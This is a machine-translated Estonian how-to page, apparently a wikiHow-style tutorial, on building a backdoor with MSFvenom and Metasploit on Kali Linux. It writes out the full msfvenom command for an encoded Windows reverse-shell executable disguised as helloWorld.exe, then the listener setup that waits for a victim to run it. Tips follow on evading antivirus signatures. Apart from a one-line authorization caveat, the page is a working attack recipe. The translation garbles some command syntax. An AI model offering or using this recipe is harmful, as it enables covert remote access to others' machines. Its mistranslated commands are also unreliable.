Peaaegu tuvastamatu tagaukse loomine MSFvenomi abil Kali Linuxis

Sisukord:

Peaaegu tuvastamatu tagaukse loomine MSFvenomi abil Kali Linuxis
Peaaegu tuvastamatu tagaukse loomine MSFvenomi abil Kali Linuxis

Video: Peaaegu tuvastamatu tagaukse loomine MSFvenomi abil Kali Linuxis

Video: Peaaegu tuvastamatu tagaukse loomine MSFvenomi abil Kali Linuxis
Video: You Stream, I stream, we all stream for ice cream! 2024, Mai
Anonim

Tagaukse kasutatakse turvamehhanismidest mööda minemiseks, sageli salaja ja enamasti tuvastamatult. Kasutades msfpayloadi ja msfencode'i kombinatsiooni MSFvenom, on võimalik luua tagauks, mis ühendab ründajaga tagasi, kasutades tagasikäigu TCP -d. Tagaukse arendamiseks peate viirusetõrjetarkvara vältimiseks muutma oma pahavara allkirja. Lõpetage see projekt paaril arvutil, millele teil on luba juurde pääseda. Selle käigus saate rohkem teavet arvuti turvalisuse ja selle tagaukse toimimise kohta.

Sammud

Looge peaaegu tuvastamatu tagauks, kasutades MSFvenomi Kali Linuxis 1. samm
Looge peaaegu tuvastamatu tagauks, kasutades MSFvenomi Kali Linuxis 1. samm

Samm 1. Käivitage Kali ja käivitage terminalikonsool

Looge peaaegu tuvastamatu tagauks, kasutades MSFvenomit Kali Linuxis 2. samm
Looge peaaegu tuvastamatu tagauks, kasutades MSFvenomit Kali Linuxis 2. samm

Samm 2. Liidese kuvamiseks tippige ifconfig ja kontrollige oma IP -aadressi

Looge peaaegu tuvastamatu tagauks, kasutades MSFvenomi Kali Linuxis 3. toimingut
Looge peaaegu tuvastamatu tagauks, kasutades MSFvenomi Kali Linuxis 3. toimingut

Samm 3. Sisestage kodeerijate loendi kuvamiseks msfvenom -l kodeerijad

Kooderina kasutate x86/shikata_ga_nai

Looge peaaegu tuvastamatu tagauks, kasutades MSFvenomi Kali Linuxis 4. samm
Looge peaaegu tuvastamatu tagauks, kasutades MSFvenomi Kali Linuxis 4. samm

Samm 4. Tippige "msfvenom -a x86 -platvorm aknad -p windows/shell/reverse_tcp LHOST = 192.168.48.129 LPORT = 4444 -b" / x00 "-e x86/shikata_ga_nai -f exe> helloWorld.exe

  • -a x86 -platvormaknad tähistavad kasutatavat arhitektuuri.
  • -p windows/shell/reverse_tcp määrab manustatavad kasulikud koormused.
  • LHOST määrab kuulaja IP -aadressi.
  • LPORT tähistab kuulajaporti.
  • -b "\ x00" tähistab halva iseloomu (null baiti) vältimist.
  • -e x86/shikata_ga_nai tähistab kodeerijate nime.
  • -f exe> helloWorld.exe tähistab vormingu väljundit.
Looge peaaegu tuvastamatu tagauks, kasutades MSFvenomi Kali Linuxis 5. samm
Looge peaaegu tuvastamatu tagauks, kasutades MSFvenomi Kali Linuxis 5. samm

Samm 5. Metasploiti aktiveerimiseks tippige msfconsole

Nüüd olete oma tagaukse loonud. Kui ohver klõpsab saidil helloWorld.exe, aktiveeritakse manustatud kesta kasulik koormus ja loob ühenduse teie süsteemiga. Ühenduse saamiseks peate Metasploitis avama multikäitleja ja määrama kasulikud koormused

Looge peaaegu tuvastamatu tagauks, kasutades MSFvenomi Kali Linuxis 6. samm
Looge peaaegu tuvastamatu tagauks, kasutades MSFvenomi Kali Linuxis 6. samm

Samm 6. Tippige use exploit/multi/handler

Looge peaaegu tuvastamatu tagauks, kasutades MSFvenomit Kali Linuxis, samm 7
Looge peaaegu tuvastamatu tagauks, kasutades MSFvenomit Kali Linuxis, samm 7

Samm 7. Tippige set payload windows/shell/reverse_tcp

Looge peaaegu tuvastamatu tagauks, kasutades MSFvenomi Kali Linuxis 8. sammu
Looge peaaegu tuvastamatu tagauks, kasutades MSFvenomi Kali Linuxis 8. sammu

Samm 8. Mooduli kontrollimiseks tippige show options

Looge peaaegu tuvastamatu tagauks, kasutades MSFvenomi Kali Linuxis 9. sammu
Looge peaaegu tuvastamatu tagauks, kasutades MSFvenomi Kali Linuxis 9. sammu

Samm 9. Tüüpikomplekt LHOST 192.168.48.129

"LHOST" tähistab kuulaja IP -aadressi

Looge peaaegu tuvastamatu tagauks, kasutades MSFvenomi Kali Linuxis 10. sammu
Looge peaaegu tuvastamatu tagauks, kasutades MSFvenomi Kali Linuxis 10. sammu

Samm 10. Sisestage komplekt LPORT 4444

"LPORT" tähistab kuulajaporti

Looge peaaegu tuvastamatu tagauks, kasutades MSFvenomi Kali Linuxis 11. samm
Looge peaaegu tuvastamatu tagauks, kasutades MSFvenomi Kali Linuxis 11. samm

Samm 11. Tippige käsk run ja oodake ühendust ohvri masinast

Looge peaaegu tuvastamatu tagauks, kasutades MSFvenomi Kali Linuxis, 12. samm
Looge peaaegu tuvastamatu tagauks, kasutades MSFvenomi Kali Linuxis, 12. samm

Samm 12. Oodake, kuni ohver klõpsab saidil helloWorld.exe

Seejärel ühendatakse teid edukalt ohvri masinaga.

Näpunäiteid

  • Kasutades -i MSFvenomis, kujutatakse kodeeringu iteratsioone. Mõnikord võivad rohkem iteratsioonid aidata AV -tarkvarast kõrvale hiilida.
  • Olete õppinud tagaukse genereerimist ja MSFvenomi abil kodeerimist, kuid see meetod ei tööta tänapäeval mõne AV -tarkvara vastu ideaalselt. Selle põhjuseks on MSFvenomi rakendusmallid. AV -müüjad on lisanud nende mallide staatilise allkirja ja lihtsalt otsige neid. Selle probleemi lahendus on kasutada erinevat täitmis malli või erinevaid tööriistu.

Soovitan: